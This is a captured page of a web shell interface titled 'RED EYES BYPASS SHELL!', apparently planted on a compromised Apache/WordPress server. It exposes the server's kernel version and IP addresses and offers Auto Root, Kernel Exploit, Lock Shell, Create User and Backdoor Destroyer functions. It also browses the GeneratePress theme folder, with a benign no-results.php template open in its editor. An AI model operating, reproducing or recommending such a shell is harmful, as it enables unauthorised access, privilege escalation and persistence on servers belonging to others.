Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
grad /
new /
wp-content /
themes /
generatepress /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
404.php
790
B
-rwxr-xr-x
archive.php
1.41
KB
-rwxr-xr-x
comments.php
3.53
KB
-rwxr-xr-x
content-404.php
1.48
KB
-rwxr-xr-x
content-link.php
2.13
KB
-rwxr-xr-x
content-page.php
1.72
KB
-rwxr-xr-x
content-single.php
1.92
KB
-rwxr-xr-x
content.php
2.13
KB
-rwxr-xr-x
footer-min.php
289
B
-rwxr-xr-x
footer.php
906
B
-rwxr-xr-x
functions.php
3.5
KB
-rwxr-xr-x
header-min.php
567
B
-rwxr-xr-x
header.php
1.43
KB
-rwxr-xr-x
index.php
1.55
KB
-rwxr-xr-x
no-results.php
1.66
KB
-rwxr-xr-x
page.php
1.07
KB
-rwxr-xr-x
readme.txt
17.59
KB
-rwxr-xr-x
screenshot.png
69.02
KB
-rwxr-xr-x
search.php
1.24
KB
-rwxr-xr-x
searchform.php
1.4
KB
-rwxr-xr-x
sidebar-left.php
659
B
-rwxr-xr-x
sidebar.php
666
B
-rwxr-xr-x
single.php
898
B
-rwxr-xr-x
style.css
1.91
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : no-results.php
<?php /** * The template part for displaying a message that posts cannot be found. * * @package GeneratePress */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } ?> <div class="no-results not-found"> <div class="inside-article"> <?php /** * generate_before_content hook. * * @since 0.1 * * @hooked generate_featured_page_header_inside_single - 10 */ do_action( 'generate_before_content' ); ?> <header <?php generate_do_attr( 'entry-header' ); ?>> <h1 class="entry-title"><?php _e( 'Nothing Found', 'generatepress' ); ?></h1> </header> <?php /** * generate_after_entry_header hook. * * @since 0.1 * * @hooked generate_post_image - 10 */ do_action( 'generate_after_entry_header' ); ?> <div class="entry-content"> <?php if ( is_home() && current_user_can( 'publish_posts' ) ) : ?> <p> <?php printf( /* translators: 1: Admin URL */ __( 'Ready to publish your first post? <a href="%1$s">Get started here</a>.', 'generatepress' ), esc_url( admin_url( 'post-new.php' ) ) ); ?> </p> <?php elseif ( is_search() ) : ?> <p><?php _e( 'Sorry, but nothing matched your search terms. Please try again with some different keywords.', 'generatepress' ); ?></p> <?php get_search_form(); ?> <?php else : ?> <p><?php _e( 'It seems we can’t find what you’re looking for. Perhaps searching can help.', 'generatepress' ); ?></p> <?php get_search_form(); ?> <?php endif; ?> </div> <?php /** * generate_after_content hook. * * @since 0.1 */ do_action( 'generate_after_content' ); ?> </div> </div>
Close